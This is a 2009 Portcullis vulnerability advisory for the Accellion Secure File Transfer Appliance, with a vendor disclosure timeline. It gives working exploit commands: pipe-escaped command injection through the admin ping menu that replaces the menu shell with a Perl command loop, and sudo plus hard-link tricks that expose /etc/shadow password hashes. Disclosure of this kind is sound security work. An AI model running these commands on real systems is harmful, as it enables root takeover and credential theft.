Portcullis Security Advisory - 09-009 Vulnerable System: Accellion Secure File Transfer Appliance Vulnerability Title: Command Line Interface Is Vulnerable To Privilege Escalation. Vulnerability Discovery And Development: Portcullis Security Testing Services. Credit For Discovery: Tim Brown - Portcullis Computer Security Ltd. Affected systems: All known versions of Secure File Transfer Appliance; the vulnerability discovered was for version FTA_7_0_259. Details: Accellion Secure File Transfer Appliance is an appliance based solution used for receiving and delivering large files. It does this by allowing users to upload and download files via https. It is generally deployed in a DMZ to allow users access from the local network as well as the Internet. It is based on a customised Redhat OS running a web application which provides the user interface. Logging into the appliance via SSH as the admin user results in a locked down menu shell being run which can be used for administrative purposes. One function it allows is to perform a ping (ICMP echo) request, presumably to debug connectivity issues between the appliance and arbitrary remote hosts. It is possible to pass a value in the host parameter of the ping menu which allows arbitrary commands to be executed as follows: acsh>> |cp cli cli.old acsh>> |head -1 cli.old > cli acsh>> |printf "while (<>) {\n" >> cli acsh>> |printf "system(\$_)\x3b\n" >> cli # ; is filtered acsh>> |printf "}\n" >> cli The "acsh>>" prompt takes an IP address and concatenates it with the "ping" command before executing it. As you can see in the case above, by escaping the command with a "|" it is possible to execute the arbitrary commands necessary to create a new shell wrapper in Perl. Using the "head" command, we extract the first line from cli.old and overwrite the existing "cli" script (preserving the initial permissions on the "cli" binary) with it. Concatenated to this is a simple Perl loop which reads a line from standard input and executes it via system(). In future, instead of being presented with the menu shell the Perl will instead execute allowing the appliance to be explored more fully. From a normal shell, it was identified that the admin user can run a number of commands as root using sudo. As with the web application, this is intended to allow for the reconfiguration of the appliance but once more it can be leveraged to execute arbitrary commands as the root user or to otherwise compromise the appliance. Three trivial attacks are outlined below: 1) Using a hard link to "/etc/shadow" combined with the allowed "sudo chmod" of "/home/admin/oldtemp" to get access to the hashes: sh-2.05b$ ln /etc/shadow /home/admin/oldtemp sh-2.05b$ sudo /bin/chmod 666 /home/admin/oldtemp Note: Here we are abusing the fact that anyone can create a hard link to a file they do not own, and that whilst permissions are initially set to be the same as on the parent file, that two hard links to the same file can have distinct permisssions. 2) Using a hard link to "/etc/shadow" combined with the allowed "sudo cp /etc/admin/temp /etc/mail/sendmail.cf": sh-2.05b$ ln /etc/shadow /home/admin/temp sh-2.05b$ sudo /bin/cp /home/admin/temp /etc/mail/sendmail.cf Note: In this case, we take advantage of the fact that "sendmail.cf is world readable and that "cp" will preserve its permissions. 3) Using sudo "/usr/local/bin/admin.pl" as outlined in the web application advisory: sh-2.05b$ sudo /usr/local/bin/admin.pl ... Impact: An attacker may execute malicious code on the target system as the root user. Exploit: Exploit code is not required. Vendor Status: 15/06/2009 - Vendor informed via email 03/07/2009 - Vendor advised thay they released a software update with version 8_0_105 04/11/2009 - Publication Copyright: Copyright � Portcullis Computer Security Limited 2009, All rights reserved worldwide. Permission is hereby granted for the electronic redistribution of this information. It is not to be edited or altered in any way without the express written consent of Portcullis Computer Security Limited. Disclaimer: The information herein contained may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. In no event shall the author/distributor (Portcullis Computer Security Limited) be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information.